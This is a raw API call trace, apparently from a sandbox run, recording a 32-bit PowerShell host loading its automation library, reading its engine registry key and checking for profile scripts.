	[0171.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.233] GetLastError () returned 0xcb
	[0171.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.233] GetLastError () returned 0xcb
	[0171.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.414] GetLastError () returned 0xcb
	[0171.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.414] GetLastError () returned 0xcb
	[0171.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.415] GetLastError () returned 0xcb
	[0171.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.415] GetLastError () returned 0xcb
	[0171.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.439] GetLastError () returned 0xcb
	[0171.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.440] GetLastError () returned 0xcb
	[0171.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.440] GetLastError () returned 0xcb
	[0171.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.440] GetLastError () returned 0xcb
	[0171.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.440] GetLastError () returned 0xcb
	[0171.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdcb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.440] GetLastError () returned 0xcb
	[0171.440] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.442] GetLastError () returned 0xcb
	[0171.546] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0171.566] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.566] GetLastError () returned 0xcb
	[0171.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.568] GetLastError () returned 0xcb
	[0171.571] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.571] GetLastError () returned 0xcb
	[0171.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.578] GetLastError () returned 0xcb
	[0172.057] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0172.058] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0172.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0172.727] GetLastError () returned 0xcb
	[0173.618] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0173.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0173.668] GetLastError () returned 0xcb
	[0175.542] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x328620
	[0175.542] GetLastError () returned 0x0
	[0175.543] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3286a8
	[0175.544] GetLastError () returned 0x0
	[0177.517] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.702] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.706] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0177.707] VirtualQuery (in: lpAddress=0xcc8e4, lpBuffer=0xcd8e4, dwLength=0x1c | out: lpBuffer=0xcd8e4*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.349] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.350] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.351] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.352] VirtualQuery (in: lpAddress=0xcd230, lpBuffer=0xce230, dwLength=0x1c | out: lpBuffer=0xce230*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.550] GetLastError () returned 0xcb
	[0178.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.550] GetLastError () returned 0xcb
	[0178.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.550] GetLastError () returned 0xcb
	[0178.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.550] GetLastError () returned 0xcb
	[0178.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.550] GetLastError () returned 0xcb
	[0178.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.779] GetLastError () returned 0xcb
	[0178.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.780] GetLastError () returned 0xcb
	[0178.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.780] GetLastError () returned 0xcb
	[0178.780] VirtualQuery (in: lpAddress=0xcd558, lpBuffer=0xce558, dwLength=0x1c | out: lpBuffer=0xce558*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.782] GetLastError () returned 0xcb
	[0178.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.782] GetLastError () returned 0xcb
	[0178.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.782] GetLastError () returned 0xcb
	[0178.782] VirtualQuery (in: lpAddress=0xcd550, lpBuffer=0xce550, dwLength=0x1c | out: lpBuffer=0xce550*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.782] VirtualQuery (in: lpAddress=0xcd204, lpBuffer=0xce204, dwLength=0x1c | out: lpBuffer=0xce204*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.783] VirtualQuery (in: lpAddress=0xcd204, lpBuffer=0xce204, dwLength=0x1c | out: lpBuffer=0xce204*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.788] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcec8c | out: phkResult=0xcec8c*=0x324) returned 0x0
	[0178.788] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcecd4, lpData=0x0, lpcbData=0xcecd0*=0x0 | out: lpType=0xcecd4*=0x1, lpData=0x0, lpcbData=0xcecd0*=0x56) returned 0x0
	[0178.788] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcecd4, lpData=0x337c48, lpcbData=0xcecd0*=0x56 | out: lpType=0xcecd4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcecd0*=0x56) returned 0x0
	[0178.789] RegCloseKey (hKey=0x324) returned 0x0
	[0178.789] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcec8c | out: phkResult=0xcec8c*=0x324) returned 0x0
	[0178.789] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcecd4, lpData=0x0, lpcbData=0xcecd0*=0x0 | out: lpType=0xcecd4*=0x1, lpData=0x0, lpcbData=0xcecd0*=0x56) returned 0x0
	[0178.789] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcecd4, lpData=0x337c48, lpcbData=0xcecd0*=0x56 | out: lpType=0xcecd4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcecd0*=0x56) returned 0x0
	[0178.790] RegCloseKey (hKey=0x324) returned 0x0
	[0178.792] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x337c48 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.792] GetLastError () returned 0x3f0
	[0178.792] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x337c48 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.793] GetLastError () returned 0x3f0
	[0178.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xce8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0178.795] GetLastError () returned 0x3f0
	[0178.795] SetErrorMode (uMode=0x1) returned 0x1
	[0178.795] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xced3c | out: lpFileInformation=0xced3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.795] GetLastError () returned 0x2
	[0178.795] SetErrorMode (uMode=0x1) returned 0x1
	[0178.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xce8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0178.795] GetLastError () returned 0x2
	[0178.795] SetErrorMode (uMode=0x1) returned 0x1
